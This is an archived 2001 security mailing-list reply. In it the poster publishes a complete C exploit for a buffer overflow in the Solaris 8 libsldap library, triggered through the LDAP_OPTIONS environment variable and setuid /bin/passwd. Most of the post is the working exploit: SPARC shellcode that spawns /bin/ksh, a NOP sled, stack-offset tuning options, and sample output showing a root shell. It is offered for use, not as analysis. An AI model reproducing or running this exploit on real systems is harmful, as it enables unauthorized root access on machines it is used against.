Re: Solaris 8 libsldap exploit

From: Fyodor (fygraveat_private)
Date: Thu Jul 05 2001 - 12:59:45 PDT

Next message: KF: "Cobalt Cube Webmail directory traversal"

Previous message: ISS XForce: "ISS Security Advisory: Remote Buffer Overflow in Multiple RADIUS Implementations"
In reply to: Noir Desir: "Solaris 8 libsldap exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Thu, Jul 05, 2001 at 02:14:09PM +0300, Noir Desir wrote:
> 
> Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with
> success.
> I usually support the anti-sec movement but I got my reasons to publish
> the exploit.
> If you want to know why, please do mail me.
> 


*hmm*.. kids, then lets publish another one as well ;-D

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>


/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
 *
 * victim% ./lod -s 316 -p 5
 * jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
 * # id
 * uid=0(root) gid=200(em) egid=3(sys)
 * # uname -a
 * SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
 * # ^D
 * victim%
 * Thu Jun 28 05:22:38 ICT 2001
 * Fyodor <fygraveat_private>
 */

#define NOP "\x80\x1c\x40\x11"
#define BUFSIZE 156
#define LOCALBUF 10000
#define NOPS     1964
#define PAD 3
#define SOFF 664

char shellcode[]=

"\x90\x1a\x40\x09"  /*  xor  %o1, %o1, %o0 */
"\x82\x10\x20\x17"  /*  mov  0x17, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b4 <main+8> */
"\x20\xbf\xff\xff"  /*  bn,a   0x108b8 <maino> */
"\x7f\xff\xff\xff"  /*  call  0x108bc <shellcode> */
"\x90\x03\xe0\x30"  /*  add  %o7, 0x30, %o0 */
"\x92\x03\xe0\x28"  /*  add  %o7, 0x28, %o1 */
"\xc0\x2b\xe0\x38"  /*  clrb  [ %o7 + 0x38 ] */
"\xd0\x23\xe0\x28"  /*  st  %o0, [ %o7 + 0x28 ] */
"\xc0\x23\xe0\x2c"  /*  clr  [ %o7 + 0x2c ] */
"\x82\x10\x20\x0b"  /*  mov  0xb, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x82\x10\x20\x01"  /*  mov  1, %g1 */
"\x91\xd0\x20\x08"  /*  ta  8 */
"\x41\x41\x41\x41"  /*  AAAA */
"\x41\x41\x41\x41"  /*  AAAA */
"\x2f\x62\x69\x6e"  /*  /bin */
"\x2f\x6b\x73\x68"  /*  /ksh */
"\x41\x57\x68\x6f";  /*  junk */

extern char *optarg;

unsigned long get_sp(void) {

   __asm__("mov %sp,%i0 \n");

}

int main(int argc, char **argv) {

    static    char buf[LOCALBUF], *ptr;
    unsigned long addr, bufsize, soff, pad;
    int i, c;

    soff = SOFF;
    bufsize = BUFSIZE;
    pad = PAD;

    while((c = getopt(argc, argv, "s:b:p:h")) !=EOF) 
        switch(c) {
            case 'b':
                bufsize = strtoul(optarg,NULL,0); 
                break;
            case 's':
                soff = strtoul(optarg,NULL,0); 
                break;
            case 'p':
                pad = strtoul(optarg,NULL,0);
                break;    
            case 'h':
            default:
                fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
                argv[0]);
                exit(1);
        }
	
    
    bzero(buf, sizeof(buf));

    strcpy(buf,"LDAP_OPTIONS=");
    ptr=buf + strlen(buf);
    
    for(i=0;i<bufsize;i++, ptr++) *ptr='A';

    addr = get_sp() + soff;
    memcpy(ptr,(char *)&addr, 4);
    memcpy(ptr+4,(char *)&addr, 4);
    ptr+=8;

    for(i=0;i<pad;i++, ptr++) *ptr='A';
    for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
    strcat(buf, shellcode);

    putenv(buf);
    fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
        addr, bufsize, soff, get_sp());

    execl("/bin/passwd","lameswd",0);
}
    
-- 
http://www.notlsd.net
PGP fingerprint = 56DD 1511 DDDA 56D7 99C7  B288 5CE5 A713 0969 A4D1

Next message: KF: "Cobalt Cube Webmail directory traversal"
Previous message: ISS XForce: "ISS Security Advisory: Remote Buffer Overflow in Multiple RADIUS Implementations"
In reply to: Noir Desir: "Solaris 8 libsldap exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 21:13:45 PDT